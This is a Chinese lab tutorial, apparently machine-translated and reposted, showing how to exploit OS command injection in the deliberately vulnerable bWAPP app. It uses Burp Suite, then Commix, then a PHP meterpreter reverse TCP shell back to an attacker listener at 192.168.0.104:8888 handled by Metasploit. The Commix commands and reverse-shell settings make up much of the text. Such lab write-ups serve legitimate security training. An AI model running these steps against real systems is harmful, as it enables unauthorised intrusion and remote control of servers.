Attaker:kali Linux
目标:bwapp
从此处下载并使用VM ware安装和运行它。
作为浏览器中的攻击者浏览器目标IP :192.168.0.105/bwapp,现在使用bee登录:bug作为凭证并从选择您的错误中选择OS命令注入 ; 然后单击上的黑客。
描述:使用Commix对Meterpreter进行命令注入攻击
图片:1912.png

这里请求的网页打开,您可以在其中执行任何命令。现在我将启动burp suite来捕获请求。要开始拦截,请单击代理选项卡并启用拦截 ; 不要忘记在浏览器中运行代理。现在给像IP的任何命令:192.168.0.105,并单击上查找。
描述:使用Commix对Meterpreter进行命令注入攻击
图片:2.png

在Burp套件中,您将获得已发布的邮件请求。在这里,我们有受害者的详细信息,这将有助于对其Web服务器进行攻击。现在从POST中选择整个数据...... &form = submit然后将其复制并保存在文本文件中。我已将其保存为os.txt并进一步将其与commix一起使用。
描述:使用Commix对Meterpreter进行命令注入攻击
图片:3.png

在之前的教程中,我们使用了手动步骤在commix中执行给定的命令以进行攻击,但这里的步骤更容易和方便申请进行攻击。现在键入以下命令以使commix开始攻击。
commix -r /root/Desktop/os.txt
点击输入或按Y作为每个问题的回复。从给定的屏幕截图中你可以看到我有受害者的shell,在这里我执行了以下命令来检索受害者的详细信息。
whoami
id
描述:使用Commix对Meterpreter进行命令注入攻击
图片:4.png

现在使用以下步骤启动反向tcp连接。
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set lhost 192.168.0.104
commix(reverse_tcp) > set lport 8888
选项要求commix为其他反向TCP shell设置连接类型'2'的后门。
commix(reverse_tcp) > 2
选项要求通过commix设置目标类型'5'以使用php meterpreter reverse tcp shell。
commix(reverse_tcp) >5
描述:使用Commix对Meterpreter进行命令注入攻击
图片:6.png

复制突出显示的文本并将其粘贴到另一个终端上,该终端将加载metasploit框架并在后台自动启动多处理程序。
描述:使用Commix对Meterpreter进行命令注入攻击
图片:7.png

一旦metasploit被加载,然后移回到运行commix的前一个终端点击这里输入。
描述:使用Commix对Meterpreter进行命令注入攻击
图片:8.png

从给定的屏幕截图中你可以看到我有一个meterpreter shell。
meterpreter>sysinfo
描述:使用Commix对Meterpreter进行命令注入攻击
图片:9.png

本文标题:渗透工具实战:使用Commix对Meterpreter进行命令注入攻击
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2331.html